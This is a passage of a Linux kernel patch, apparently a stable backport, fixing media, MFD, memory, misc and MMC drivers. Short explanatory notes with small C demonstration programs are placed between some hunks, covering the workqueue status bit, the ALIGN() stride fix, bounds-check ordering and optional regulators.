+ 	vdec->source_change--;
+ 	vpu_notify_source_change(inst);
++	vpu_set_last_buffer_dequeued(inst, false);
+ }
+ 
+ static int vdec_update_state(struct vpu_inst *inst, enum vpu_codec_state state, u32 force)
+@@ -264,7 +265,7 @@ static void vdec_set_last_buffer_dequeued(struct vpu_inst *inst)
+ 		return;
+ 
+ 	if (vdec->eos_received) {
+-		if (!vpu_set_last_buffer_dequeued(inst)) {
++		if (!vpu_set_last_buffer_dequeued(inst, true)) {
+ 			vdec->eos_received--;
+ 			vdec_update_state(inst, VPU_CODEC_STATE_DRAIN, 0);
+ 		}
+@@ -517,7 +518,7 @@ static int vdec_drain(struct vpu_inst *inst)
+ 		return 0;
+ 
+ 	if (!vdec->params.frame_count) {
+-		vpu_set_last_buffer_dequeued(inst);
++		vpu_set_last_buffer_dequeued(inst, true);
+ 		return 0;
+ 	}
+ 
+@@ -556,7 +557,7 @@ static int vdec_cmd_stop(struct vpu_inst *inst)
+ 	vpu_trace(inst->dev, "[%d]\n", inst->id);
+ 
+ 	if (inst->state == VPU_CODEC_STATE_DEINIT) {
+-		vpu_set_last_buffer_dequeued(inst);
++		vpu_set_last_buffer_dequeued(inst, true);
+ 	} else {
+ 		vdec->drain = 1;
+ 		vdec_drain(inst);
+diff --git a/drivers/media/platform/amphion/venc.c b/drivers/media/platform/amphion/venc.c
+index 37212f087fdd9..e8cb22da938e6 100644
+--- a/drivers/media/platform/amphion/venc.c
++++ b/drivers/media/platform/amphion/venc.c
+@@ -468,7 +468,7 @@ static int venc_encoder_cmd(struct file *file, void *fh, struct v4l2_encoder_cmd
+ 	vpu_inst_lock(inst);
+ 	if (cmd->cmd == V4L2_ENC_CMD_STOP) {
+ 		if (inst->state == VPU_CODEC_STATE_DEINIT)
+-			vpu_set_last_buffer_dequeued(inst);
++			vpu_set_last_buffer_dequeued(inst, true);
+ 		else
+ 			venc_request_eos(inst);
+ 	}
+@@ -888,7 +888,7 @@ static void venc_set_last_buffer_dequeued(struct vpu_inst *inst)
+ 	struct venc_t *venc = inst->priv;
+ 
+ 	if (venc->stopped && list_empty(&venc->frames))
+-		vpu_set_last_buffer_dequeued(inst);
++		vpu_set_last_buffer_dequeued(inst, true);
+ }
+ 
+ static void venc_stop_done(struct vpu_inst *inst)
+diff --git a/drivers/media/platform/amphion/vpu_malone.c b/drivers/media/platform/amphion/vpu_malone.c
+index ae094cdc9bfc8..c2f4fb12c3b64 100644
+--- a/drivers/media/platform/amphion/vpu_malone.c
++++ b/drivers/media/platform/amphion/vpu_malone.c
+@@ -1286,6 +1286,15 @@ static int vpu_malone_insert_scode_pic(struct malone_scode_t *scode, u32 codec_i
+ 	return sizeof(hdr);
+ }
+ 
++static int vpu_malone_insert_scode_vc1_g_seq(struct malone_scode_t *scode)
++{
++	if (!scode->inst->total_input_count)
++		return 0;
++	if (vpu_vb_is_codecconfig(to_vb2_v4l2_buffer(scode->vb)))
++		scode->need_data = 0;
++	return 0;
++}
++
+ static int vpu_malone_insert_scode_vc1_g_pic(struct malone_scode_t *scode)
+ {
+ 	struct vb2_v4l2_buffer *vbuf;
+@@ -1317,6 +1326,8 @@ static int vpu_malone_insert_scode_vc1_l_seq(struct malone_scode_t *scode)
+ 	int size = 0;
+ 	u8 rcv_seqhdr[MALONE_VC1_RCV_SEQ_HEADER_LEN];
+ 
++	if (vpu_vb_is_codecconfig(to_vb2_v4l2_buffer(scode->vb)))
++		scode->need_data = 0;
+ 	if (scode->inst->total_input_count)
+ 		return 0;
+ 	scode->need_data = 0;
+@@ -1421,6 +1432,7 @@ static const struct malone_scode_handler scode_handlers[] = {
+ 	},
+ 	{
+ 		.pixelformat = V4L2_PIX_FMT_VC1_ANNEX_G,
++		.insert_scode_seq = vpu_malone_insert_scode_vc1_g_seq,
+ 		.insert_scode_pic = vpu_malone_insert_scode_vc1_g_pic,
+ 	},
+ 	{
+diff --git a/drivers/media/platform/amphion/vpu_v4l2.c b/drivers/media/platform/amphion/vpu_v4l2.c
+index 590d1084e5a5d..a74953191c221 100644
+--- a/drivers/media/platform/amphion/vpu_v4l2.c
++++ b/drivers/media/platform/amphion/vpu_v4l2.c
+@@ -100,7 +100,7 @@ int vpu_notify_source_change(struct vpu_inst *inst)
+ 	return 0;
+ }
+ 
+-int vpu_set_last_buffer_dequeued(struct vpu_inst *inst)
++int vpu_set_last_buffer_dequeued(struct vpu_inst *inst, bool eos)
+ {
+ 	struct vb2_queue *q;
+ 
+@@ -116,7 +116,8 @@ int vpu_set_last_buffer_dequeued(struct vpu_inst *inst)
+ 	vpu_trace(inst->dev, "last buffer dequeued\n");
+ 	q->last_buffer_dequeued = true;
+ 	wake_up(&q->done_wq);
+-	vpu_notify_eos(inst);
++	if (eos)
++		vpu_notify_eos(inst);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/media/platform/amphion/vpu_v4l2.h b/drivers/media/platform/amphion/vpu_v4l2.h
+index 795ca33a6a507..000af24a06ba0 100644
+--- a/drivers/media/platform/amphion/vpu_v4l2.h
++++ b/drivers/media/platform/amphion/vpu_v4l2.h
+@@ -26,7 +26,7 @@ struct vb2_v4l2_buffer *vpu_find_buf_by_idx(struct vpu_inst *inst, u32 type, u32
+ void vpu_v4l2_set_error(struct vpu_inst *inst);
+ int vpu_notify_eos(struct vpu_inst *inst);
+ int vpu_notify_source_change(struct vpu_inst *inst);
+-int vpu_set_last_buffer_dequeued(struct vpu_inst *inst);
++int vpu_set_last_buffer_dequeued(struct vpu_inst *inst, bool eos);
+ void vpu_vb2_buffers_return(struct vpu_inst *inst, unsigned int type, enum vb2_buffer_state state);
+ int vpu_get_num_buffers(struct vpu_inst *inst, u32 type);
+ bool vpu_is_source_empty(struct vpu_inst *inst);
+diff --git a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c
+index f3073d1e7f420..03f8d7cd8eddc 100644
+--- a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c
++++ b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c
+@@ -71,7 +71,6 @@ static void vdec_msg_queue_dec(struct vdec_msg_queue *msg_queue, int hardware_in
+ int vdec_msg_queue_qbuf(struct vdec_msg_queue_ctx *msg_ctx, struct vdec_lat_buf *buf)
+ {
+ 	struct list_head *head;
+-	int status;
+ 
+ 	head = vdec_get_buf_list(msg_ctx->hardware_index, buf);
+ 	if (!head) {
+@@ -87,12 +86,9 @@ int vdec_msg_queue_qbuf(struct vdec_msg_queue_ctx *msg_ctx, struct vdec_lat_buf
+ 	if (msg_ctx->hardware_index != MTK_VDEC_CORE) {
+ 		wake_up_all(&msg_ctx->ready_to_use);
+ 	} else {
+-		if (buf->ctx->msg_queue.core_work_cnt <
+-			atomic_read(&buf->ctx->msg_queue.core_list_cnt)) {
+-			status = queue_work(buf->ctx->dev->core_workqueue,
+-					    &buf->ctx->msg_queue.core_work);
+-			if (status)
+-				buf->ctx->msg_queue.core_work_cnt++;
++		if (!(buf->ctx->msg_queue.status & CONTEXT_LIST_QUEUED)) {
++			queue_work(buf->ctx->dev->core_workqueue, &buf->ctx->msg_queue.core_work);
++			buf->ctx->msg_queue.status |= CONTEXT_LIST_QUEUED;
+ 		}
+ 	}
+ 
+@@ -261,7 +257,10 @@ static void vdec_msg_queue_core_work(struct work_struct *work)
+ 		container_of(msg_queue, struct mtk_vcodec_ctx, msg_queue);
+ 	struct mtk_vcodec_dev *dev = ctx->dev;
+ 	struct vdec_lat_buf *lat_buf;
+-	int status;
++
++	spin_lock(&ctx->dev->msg_queue_core_ctx.ready_lock);
++	ctx->msg_queue.status &= ~CONTEXT_LIST_QUEUED;
++	spin_unlock(&ctx->dev->msg_queue_core_ctx.ready_lock);
+ 
+ 	lat_buf = vdec_msg_queue_dqbuf(&dev->msg_queue_core_ctx);
+ 	if (!lat_buf)
+@@ -278,17 +277,13 @@ static void vdec_msg_queue_core_work(struct work_struct *work)
+ 	vdec_msg_queue_qbuf(&ctx->msg_queue.lat_ctx, lat_buf);
+ 
+ 	wake_up_all(&ctx->msg_queue.core_dec_done);
+-	spin_lock(&dev->msg_queue_core_ctx.ready_lock);
+-	lat_buf->ctx->msg_queue.core_work_cnt--;
+-
+-	if (lat_buf->ctx->msg_queue.core_work_cnt <
+-		atomic_read(&lat_buf->ctx->msg_queue.core_list_cnt)) {
+-		status = queue_work(lat_buf->ctx->dev->core_workqueue,
+-				    &lat_buf->ctx->msg_queue.core_work);
+-		if (status)
+-			lat_buf->ctx->msg_queue.core_work_cnt++;
++	if (!(ctx->msg_queue.status & CONTEXT_LIST_QUEUED) &&
++	    atomic_read(&msg_queue->core_list_cnt)) {
++		spin_lock(&ctx->dev->msg_queue_core_ctx.ready_lock);
++		ctx->msg_queue.status |= CONTEXT_LIST_QUEUED;
++		spin_unlock(&ctx->dev->msg_queue_core_ctx.ready_lock);
++		queue_work(ctx->dev->core_workqueue, &msg_queue->core_work);
+ 	}
+-	spin_unlock(&dev->msg_queue_core_ctx.ready_lock);
+ }
+ 
+ int vdec_msg_queue_init(struct vdec_msg_queue *msg_queue,
+@@ -303,13 +298,13 @@ int vdec_msg_queue_init(struct vdec_msg_queue *msg_queue,
+ 		return 0;
+ 
+ 	msg_queue->ctx = ctx;
+-	msg_queue->core_work_cnt = 0;
+ 	vdec_msg_queue_init_ctx(&msg_queue->lat_ctx, MTK_VDEC_LAT0);
+ 	INIT_WORK(&msg_queue->core_work, vdec_msg_queue_core_work);
+ 
+ 	atomic_set(&msg_queue->lat_list_cnt, 0);
+ 	atomic_set(&msg_queue->core_list_cnt, 0);
+ 	init_waitqueue_head(&msg_queue->core_dec_done);
++	msg_queue->status = CONTEXT_LIST_EMPTY;
+ 
+ 	msg_queue->wdma_addr.size =
+ 		vde_msg_queue_get_trans_size(ctx->picinfo.buf_w,
+diff --git a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.h b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.h
+index a5d44bc97c16b..8f82d14847726 100644
+--- a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.h
++++ b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.h
+@@ -21,6 +21,18 @@ struct mtk_vcodec_ctx;
+ struct mtk_vcodec_dev;
+ typedef int (*core_decode_cb_t)(struct vdec_lat_buf *lat_buf);
+ 
++/**
++ * enum core_ctx_status - Context decode status for core hardware.
++ * @CONTEXT_LIST_EMPTY: No buffer queued on core hardware (must always be 0)
++ * @CONTEXT_LIST_QUEUED: Buffer queued to core work list
++ * @CONTEXT_LIST_DEC_DONE: Context decode done
++ */
++enum core_ctx_status {
++	CONTEXT_LIST_EMPTY = 0,
++	CONTEXT_LIST_QUEUED,
++	CONTEXT_LIST_DEC_DONE,
++};
++
+ /**
+  * struct vdec_msg_queue_ctx - represents a queue for buffers ready to be processed
+  * @ready_to_use: ready used queue used to signalize when get a job queue
+@@ -77,7 +89,7 @@ struct vdec_lat_buf {
+  * @lat_list_cnt: used to record each instance lat list count
+  * @core_list_cnt: used to record each instance core list count
+  * @core_dec_done: core work queue decode done event
+- * @core_work_cnt: the number of core work in work queue
++ * @status: current context decode status for core hardware
+  */
+ struct vdec_msg_queue {
+ 	struct vdec_lat_buf lat_buf[NUM_BUFFER_COUNT];
+@@ -93,7 +105,7 @@ struct vdec_msg_queue {
+ 	atomic_t lat_list_cnt;
+ 	atomic_t core_list_cnt;
+ 	wait_queue_head_t core_dec_done;
+-	int core_work_cnt;
++	int status;
+ };
+ 
+ /**
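
The core_work_cnt counter is replaced by a single CONTEXT_LIST_QUEUED status
bit: a context is put on the core workqueue at most once, and the worker
clears the bit first so a later qbuf can requeue it. A minimal model of that
state machine, with the spinlock and workqueue reduced to plain variables:

#include <stdio.h>

#define CONTEXT_LIST_EMPTY	0
#define CONTEXT_LIST_QUEUED	(1 << 0)

struct ctx { int status; int queued_jobs; };

static void queue_core_work(struct ctx *c)
{
	/* in the driver this test runs under msg_queue_core_ctx.ready_lock */
	if (c->status & CONTEXT_LIST_QUEUED)
		return;			/* already on the workqueue */
	c->status |= CONTEXT_LIST_QUEUED;
	c->queued_jobs++;		/* queue_work() stand-in */
}

static void core_work_fn(struct ctx *c)
{
	c->status &= ~CONTEXT_LIST_QUEUED;	/* first thing the worker does */
	/* ... decode one lat buffer, requeue if more work is pending ... */
}

int main(void)
{
	struct ctx c = { CONTEXT_LIST_EMPTY, 0 };

	queue_core_work(&c);
	queue_core_work(&c);	/* suppressed: already queued */
	printf("queued %d time(s)\n", c.queued_jobs);
	core_work_fn(&c);
	queue_core_work(&c);	/* allowed again after the worker ran */
	printf("queued %d time(s)\n", c.queued_jobs);
	return 0;
}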
+diff --git a/drivers/media/platform/qcom/venus/helpers.c b/drivers/media/platform/qcom/venus/helpers.c
+index ab6a29ffc81e2..ca6555bdc92fa 100644
+--- a/drivers/media/platform/qcom/venus/helpers.c
++++ b/drivers/media/platform/qcom/venus/helpers.c
+@@ -1036,8 +1036,8 @@ static u32 get_framesize_raw_yuv420_tp10_ubwc(u32 width, u32 height)
+ 	u32 extradata = SZ_16K;
+ 	u32 size;
+ 
+-	y_stride = ALIGN(ALIGN(width, 192) * 4 / 3, 256);
+-	uv_stride = ALIGN(ALIGN(width, 192) * 4 / 3, 256);
++	y_stride = ALIGN(width * 4 / 3, 256);
++	uv_stride = ALIGN(width * 4 / 3, 256);
+ 	y_sclines = ALIGN(height, 16);
+ 	uv_sclines = ALIGN((height + 1) >> 1, 16);
+ 
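
The venus stride fix drops ALIGN(width, 192) because the kernel's ALIGN() macro is a power-of-two mask and silently miscomputes for a non-power-of-two alignment like 192. A stand-alone check of that behavior, using the same macro definition; the width is just an example value:

#include <stdio.h>

#define ALIGN(x, a) (((x) + (a) - 1) & ~((a) - 1))

int main(void)
{
	/* 1920 is already a multiple of 192, yet the mask form says 2048. */
	printf("ALIGN(1920, 192) = %u (expected 1920)\n",
	       (unsigned int)ALIGN(1920, 192));
	/* 256 is a power of two, so the stride ALIGN stays correct. */
	printf("ALIGN(1920 * 4 / 3, 256) = %u\n",
	       (unsigned int)ALIGN(1920 * 4 / 3, 256));
	return 0;
}
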
+diff --git a/drivers/media/usb/dvb-usb-v2/az6007.c b/drivers/media/usb/dvb-usb-v2/az6007.c
+index 62ee09f28a0bc..7524c90f5da61 100644
+--- a/drivers/media/usb/dvb-usb-v2/az6007.c
++++ b/drivers/media/usb/dvb-usb-v2/az6007.c
+@@ -202,7 +202,8 @@ static int az6007_rc_query(struct dvb_usb_device *d)
+ 	unsigned code;
+ 	enum rc_proto proto;
+ 
+-	az6007_read(d, AZ6007_READ_IR, 0, 0, st->data, 10);
++	if (az6007_read(d, AZ6007_READ_IR, 0, 0, st->data, 10) < 0)
++		return -EIO;
+ 
+ 	if (st->data[1] == 0x44)
+ 		return 0;
+diff --git a/drivers/media/usb/siano/smsusb.c b/drivers/media/usb/siano/smsusb.c
+index 6f443c542c6da..640737d3b8aeb 100644
+--- a/drivers/media/usb/siano/smsusb.c
++++ b/drivers/media/usb/siano/smsusb.c
+@@ -179,7 +179,8 @@ static void smsusb_stop_streaming(struct smsusb_device_t *dev)
+ 
+ 	for (i = 0; i < MAX_URBS; i++) {
+ 		usb_kill_urb(&dev->surbs[i].urb);
+-		cancel_work_sync(&dev->surbs[i].wq);
++		if (dev->surbs[i].wq.func)
++			cancel_work_sync(&dev->surbs[i].wq);
+ 
+ 		if (dev->surbs[i].cb) {
+ 			smscore_putbuffer(dev->coredev, dev->surbs[i].cb);
+diff --git a/drivers/memory/brcmstb_dpfe.c b/drivers/memory/brcmstb_dpfe.c
+index 76c82e9c8fceb..9339f80b21c50 100644
+--- a/drivers/memory/brcmstb_dpfe.c
++++ b/drivers/memory/brcmstb_dpfe.c
+@@ -434,15 +434,17 @@ static void __finalize_command(struct brcmstb_dpfe_priv *priv)
+ static int __send_command(struct brcmstb_dpfe_priv *priv, unsigned int cmd,
+ 			  u32 result[])
+ {
+-	const u32 *msg = priv->dpfe_api->command[cmd];
+ 	void __iomem *regs = priv->regs;
+ 	unsigned int i, chksum, chksum_idx;
++	const u32 *msg;
+ 	int ret = 0;
+ 	u32 resp;
+ 
+ 	if (cmd >= DPFE_CMD_MAX)
+ 		return -1;
+ 
++	msg = priv->dpfe_api->command[cmd];
++
+ 	mutex_lock(&priv->lock);
+ 
+ 	/* Wait for DCPU to become ready */
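
The __send_command() change is a plain ordering fix: the command table was indexed before the cmd range check, so an out-of-range cmd read past the array even though the call then bailed out. A sketch of the corrected check-then-index shape, with a stand-in string table (the real entries are u32 message arrays):

#include <stdio.h>

#define CMD_MAX 3
static const char *command[CMD_MAX] = { "GET_INFO", "GET_REFRESH", "GET_VENDOR" };

static int send_command(unsigned int cmd)
{
	const char *msg;

	if (cmd >= CMD_MAX)  /* check first... */
		return -1;
	msg = command[cmd];  /* ...then index: no out-of-bounds read */
	printf("sending %s\n", msg);
	return 0;
}

int main(void)
{
	send_command(1);
	return send_command(7) == -1 ? 0 : 1;
}
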
+diff --git a/drivers/memstick/host/r592.c b/drivers/memstick/host/r592.c
+index 42bfc46842b82..461f5ffd02bc1 100644
+--- a/drivers/memstick/host/r592.c
++++ b/drivers/memstick/host/r592.c
+@@ -44,12 +44,10 @@ static const char *tpc_names[] = {
+  * memstick_debug_get_tpc_name - debug helper that returns string for
+  * a TPC number
+  */
+-const char *memstick_debug_get_tpc_name(int tpc)
++static __maybe_unused const char *memstick_debug_get_tpc_name(int tpc)
+ {
+ 	return tpc_names[tpc-1];
+ }
+-EXPORT_SYMBOL(memstick_debug_get_tpc_name);
+-
+ 
+ /* Read a register*/
+ static inline u32 r592_read_reg(struct r592_device *dev, int address)
+diff --git a/drivers/mfd/intel-lpss-acpi.c b/drivers/mfd/intel-lpss-acpi.c
+index a143c8dca2d93..212818aef93e2 100644
+--- a/drivers/mfd/intel-lpss-acpi.c
++++ b/drivers/mfd/intel-lpss-acpi.c
+@@ -183,6 +183,9 @@ static int intel_lpss_acpi_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 
+ 	info->mem = platform_get_resource(pdev, IORESOURCE_MEM, 0);
++	if (!info->mem)
++		return -ENODEV;
++
+ 	info->irq = platform_get_irq(pdev, 0);
+ 
+ 	ret = intel_lpss_probe(&pdev->dev, info);
+diff --git a/drivers/mfd/rt5033.c b/drivers/mfd/rt5033.c
+index f1236a9acf304..df095e91e2666 100644
+--- a/drivers/mfd/rt5033.c
++++ b/drivers/mfd/rt5033.c
+@@ -41,9 +41,6 @@ static const struct mfd_cell rt5033_devs[] = {
+ 	{
+ 		.name = "rt5033-charger",
+ 		.of_compatible = "richtek,rt5033-charger",
+-	}, {
+-		.name = "rt5033-battery",
+-		.of_compatible = "richtek,rt5033-battery",
+ 	}, {
+ 		.name = "rt5033-led",
+ 		.of_compatible = "richtek,rt5033-led",
+diff --git a/drivers/mfd/stmfx.c b/drivers/mfd/stmfx.c
+index 5dd7d96884596..b1ecd85ad2a8a 100644
+--- a/drivers/mfd/stmfx.c
++++ b/drivers/mfd/stmfx.c
+@@ -330,9 +330,8 @@ static int stmfx_chip_init(struct i2c_client *client)
+ 	stmfx->vdd = devm_regulator_get_optional(&client->dev, "vdd");
+ 	ret = PTR_ERR_OR_ZERO(stmfx->vdd);
+ 	if (ret) {
+-		if (ret == -ENODEV)
+-			stmfx->vdd = NULL;
+-		else
++		stmfx->vdd = NULL;
++		if (ret != -ENODEV)
+ 			return dev_err_probe(&client->dev, ret, "Failed to get VDD regulator\n");
+ 	}
+ 
+@@ -387,7 +386,7 @@ static int stmfx_chip_init(struct i2c_client *client)
+ 
+ err:
+ 	if (stmfx->vdd)
+-		return regulator_disable(stmfx->vdd);
++		regulator_disable(stmfx->vdd);
+ 
+ 	return ret;
+ }
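
Two conventions meet in the stmfx hunks: devm_regulator_get_optional() signals "no such supply" with -ENODEV, which should be treated as a validly absent regulator, and the error path must not let the disable call's return value replace the original error. A small sketch of the first pattern, with a stand-in getter rather than the regulator API:

#include <errno.h>
#include <stdio.h>

struct regulator;

static struct regulator *get_optional(int *err)
{
	*err = -ENODEV;  /* pretend the supply is not described */
	return NULL;
}

int main(void)
{
	int err;
	struct regulator *vdd = get_optional(&err);

	if (err) {
		vdd = NULL;            /* absent is fine... */
		if (err != -ENODEV) {  /* ...other errors are not */
			fprintf(stderr, "failed to get VDD: %d\n", err);
			return 1;
		}
	}
	printf("vdd %s\n", vdd ? "present" : "absent");
	return 0;
}
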
+diff --git a/drivers/mfd/stmpe.c b/drivers/mfd/stmpe.c
+index 0c4f74197d3e0..aef29221d7c12 100644
+--- a/drivers/mfd/stmpe.c
++++ b/drivers/mfd/stmpe.c
+@@ -1485,9 +1485,9 @@ int stmpe_probe(struct stmpe_client_info *ci, enum stmpe_partnum partnum)
+ 
+ void stmpe_remove(struct stmpe *stmpe)
+ {
+-	if (!IS_ERR(stmpe->vio))
++	if (!IS_ERR(stmpe->vio) && regulator_is_enabled(stmpe->vio))
+ 		regulator_disable(stmpe->vio);
+-	if (!IS_ERR(stmpe->vcc))
++	if (!IS_ERR(stmpe->vcc) && regulator_is_enabled(stmpe->vcc))
+ 		regulator_disable(stmpe->vcc);
+ 
+ 	__stmpe_disable(stmpe, STMPE_BLOCK_ADC);
+diff --git a/drivers/mfd/wcd934x.c b/drivers/mfd/wcd934x.c
+index 68e2fa2fda99c..32ed2bd863758 100644
+--- a/drivers/mfd/wcd934x.c
++++ b/drivers/mfd/wcd934x.c
+@@ -253,8 +253,9 @@ static int wcd934x_slim_probe(struct slim_device *sdev)
+ 	usleep_range(600, 650);
+ 	reset_gpio = devm_gpiod_get_optional(dev, "reset", GPIOD_OUT_LOW);
+ 	if (IS_ERR(reset_gpio)) {
+-		return dev_err_probe(dev, PTR_ERR(reset_gpio),
+-				"Failed to get reset gpio: err = %ld\n", PTR_ERR(reset_gpio));
++		ret = dev_err_probe(dev, PTR_ERR(reset_gpio),
++				    "Failed to get reset gpio\n");
++		goto err_disable_regulators;
+ 	}
+ 	msleep(20);
+ 	gpiod_set_value(reset_gpio, 1);
+@@ -264,6 +265,10 @@ static int wcd934x_slim_probe(struct slim_device *sdev)
+ 	dev_set_drvdata(dev, ddata);
+ 
+ 	return 0;
++
++err_disable_regulators:
++	regulator_bulk_disable(WCD934X_MAX_SUPPLY, ddata->supplies);
++	return ret;
+ }
+ 
+ static void wcd934x_slim_remove(struct slim_device *sdev)
+diff --git a/drivers/misc/fastrpc.c b/drivers/misc/fastrpc.c
+index 8b1e8661c3d73..e5cabb9012135 100644
+--- a/drivers/misc/fastrpc.c
++++ b/drivers/misc/fastrpc.c
+@@ -2030,6 +2030,9 @@ static int fastrpc_device_register(struct device *dev, struct fastrpc_channel_ct
+ 	fdev->miscdev.fops = &fastrpc_fops;
+ 	fdev->miscdev.name = devm_kasprintf(dev, GFP_KERNEL, "fastrpc-%s%s",
+ 					    domain, is_secured ? "-secure" : "");
++	if (!fdev->miscdev.name)
++		return -ENOMEM;
++
+ 	err = misc_register(&fdev->miscdev);
+ 	if (!err) {
+ 		if (is_secured)
+diff --git a/drivers/misc/lkdtm/core.c b/drivers/misc/lkdtm/core.c
+index b4712ff196b4e..0772e4a4757e9 100644
+--- a/drivers/misc/lkdtm/core.c
++++ b/drivers/misc/lkdtm/core.c
+@@ -79,7 +79,7 @@ static struct crashpoint crashpoints[] = {
+ 	CRASHPOINT("INT_HARDWARE_ENTRY", "do_IRQ"),
+ 	CRASHPOINT("INT_HW_IRQ_EN",	 "handle_irq_event"),
+ 	CRASHPOINT("INT_TASKLET_ENTRY",	 "tasklet_action"),
+-	CRASHPOINT("FS_DEVRW",		 "ll_rw_block"),
++	CRASHPOINT("FS_SUBMIT_BH",		 "submit_bh"),
+ 	CRASHPOINT("MEM_SWAPOUT",	 "shrink_inactive_list"),
+ 	CRASHPOINT("TIMERADD",		 "hrtimer_start"),
+ 	CRASHPOINT("SCSI_QUEUE_RQ",	 "scsi_queue_rq"),
+diff --git a/drivers/mmc/core/card.h b/drivers/mmc/core/card.h
+index cfdd1ff40b865..4edf9057fa79d 100644
+--- a/drivers/mmc/core/card.h
++++ b/drivers/mmc/core/card.h
+@@ -53,6 +53,10 @@ struct mmc_fixup {
+ 	unsigned int manfid;
+ 	unsigned short oemid;
+ 
++	/* Manufacturing date */
++	unsigned short year;
++	unsigned char month;
++
+ 	/* SDIO-specific fields. You can use SDIO_ANY_ID here of course */
+ 	u16 cis_vendor, cis_device;
+ 
+@@ -68,6 +72,8 @@ struct mmc_fixup {
+ 
+ #define CID_MANFID_ANY (-1u)
+ #define CID_OEMID_ANY ((unsigned short) -1)
++#define CID_YEAR_ANY ((unsigned short) -1)
++#define CID_MONTH_ANY ((unsigned char) -1)
+ #define CID_NAME_ANY (NULL)
+ 
+ #define EXT_CSD_REV_ANY (-1u)
+@@ -81,17 +87,21 @@ struct mmc_fixup {
+ #define CID_MANFID_APACER       0x27
+ #define CID_MANFID_KINGSTON     0x70
+ #define CID_MANFID_HYNIX	0x90
++#define CID_MANFID_KINGSTON_SD	0x9F
+ #define CID_MANFID_NUMONYX	0xFE
+ 
+ #define END_FIXUP { NULL }
+ 
+-#define _FIXUP_EXT(_name, _manfid, _oemid, _rev_start, _rev_end,	\
+-		   _cis_vendor, _cis_device,				\
+-		   _fixup, _data, _ext_csd_rev)				\
++#define _FIXUP_EXT(_name, _manfid, _oemid, _year, _month,	\
++		   _rev_start, _rev_end,			\
++		   _cis_vendor, _cis_device,			\
++		   _fixup, _data, _ext_csd_rev)			\
+ 	{						\
+ 		.name = (_name),			\
+ 		.manfid = (_manfid),			\
+ 		.oemid = (_oemid),			\
++		.year = (_year),			\
++		.month = (_month),			\
+ 		.rev_start = (_rev_start),		\
+ 		.rev_end = (_rev_end),			\
+ 		.cis_vendor = (_cis_vendor),		\
+@@ -103,8 +113,8 @@ struct mmc_fixup {
+ 
+ #define MMC_FIXUP_REV(_name, _manfid, _oemid, _rev_start, _rev_end,	\
+ 		      _fixup, _data, _ext_csd_rev)			\
+-	_FIXUP_EXT(_name, _manfid,					\
+-		   _oemid, _rev_start, _rev_end,			\
++	_FIXUP_EXT(_name, _manfid, _oemid, CID_YEAR_ANY, CID_MONTH_ANY,	\
++		   _rev_start, _rev_end,				\
+ 		   SDIO_ANY_ID, SDIO_ANY_ID,				\
+ 		   _fixup, _data, _ext_csd_rev)				\
+ 
+@@ -118,8 +128,9 @@ struct mmc_fixup {
+ 		      _ext_csd_rev)
+ 
+ #define SDIO_FIXUP(_vendor, _device, _fixup, _data)			\
+-	_FIXUP_EXT(CID_NAME_ANY, CID_MANFID_ANY,			\
+-		    CID_OEMID_ANY, 0, -1ull,				\
++	_FIXUP_EXT(CID_NAME_ANY, CID_MANFID_ANY, CID_OEMID_ANY,		\
++		   CID_YEAR_ANY, CID_MONTH_ANY,				\
++		   0, -1ull,						\
+ 		   _vendor, _device,					\
+ 		   _fixup, _data, EXT_CSD_REV_ANY)			\
+ 
+@@ -264,4 +275,9 @@ static inline int mmc_card_broken_sd_discard(const struct mmc_card *c)
+ 	return c->quirks & MMC_QUIRK_BROKEN_SD_DISCARD;
+ }
+ 
++static inline int mmc_card_broken_sd_cache(const struct mmc_card *c)
++{
++	return c->quirks & MMC_QUIRK_BROKEN_SD_CACHE;
++}
++
+ #endif
+diff --git a/drivers/mmc/core/quirks.h b/drivers/mmc/core/quirks.h
+index 29b9497936df9..857315f185fcf 100644
+--- a/drivers/mmc/core/quirks.h
++++ b/drivers/mmc/core/quirks.h
+@@ -53,6 +53,15 @@ static const struct mmc_fixup __maybe_unused mmc_blk_fixups[] = {
+ 	MMC_FIXUP("MMC32G", CID_MANFID_TOSHIBA, CID_OEMID_ANY, add_quirk_mmc,
+ 		  MMC_QUIRK_BLK_NO_CMD23),
+ 
++	/*
++	 * Kingston Canvas Go! Plus microSD cards never finish SD cache flush.
++	 * This has so far only been observed on cards from 11/2019, while new
++	 * cards from 05/2023 do not exhibit this behavior.
++	 */
++	_FIXUP_EXT("SD64G", CID_MANFID_KINGSTON_SD, 0x5449, 2019, 11,
++		   0, -1ull, SDIO_ANY_ID, SDIO_ANY_ID, add_quirk_sd,
++		   MMC_QUIRK_BROKEN_SD_CACHE, EXT_CSD_REV_ANY),
++
+ 	/*
+ 	 * Some SD cards lockup while using CMD23 multiblock transfers.
+ 	 */
+@@ -100,6 +109,20 @@ static const struct mmc_fixup __maybe_unused mmc_blk_fixups[] = {
+ 	MMC_FIXUP("V10016", CID_MANFID_KINGSTON, CID_OEMID_ANY, add_quirk_mmc,
+ 		  MMC_QUIRK_TRIM_BROKEN),
+ 
++	/*
++	 * Kingston EMMC04G-M627 advertises TRIM but it does not seem to
++	 * support being used to offload WRITE_ZEROES.
++	 */
++	MMC_FIXUP("M62704", CID_MANFID_KINGSTON, 0x0100, add_quirk_mmc,
++		  MMC_QUIRK_TRIM_BROKEN),
++
++	/*
++	 * Micron MTFC4GACAJCN-1M advertises TRIM but it does not seem to
++	 * support being used to offload WRITE_ZEROES.
++	 */
++	MMC_FIXUP("Q2J54A", CID_MANFID_MICRON, 0x014e, add_quirk_mmc,
++		  MMC_QUIRK_TRIM_BROKEN),
++
+ 	/*
+ 	 * Some SD cards reports discard support while they don't
+ 	 */
+@@ -209,6 +232,10 @@ static inline void mmc_fixup_device(struct mmc_card *card,
+ 		if (f->of_compatible &&
+ 		    !mmc_fixup_of_compatible_match(card, f->of_compatible))
+ 			continue;
++		if (f->year != CID_YEAR_ANY && f->year != card->cid.year)
++			continue;
++		if (f->month != CID_MONTH_ANY && f->month != card->cid.month)
++			continue;
+ 
+ 		dev_dbg(&card->dev, "calling %ps\n", f->vendor_fixup);
+ 		f->vendor_fixup(card, f->data);
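
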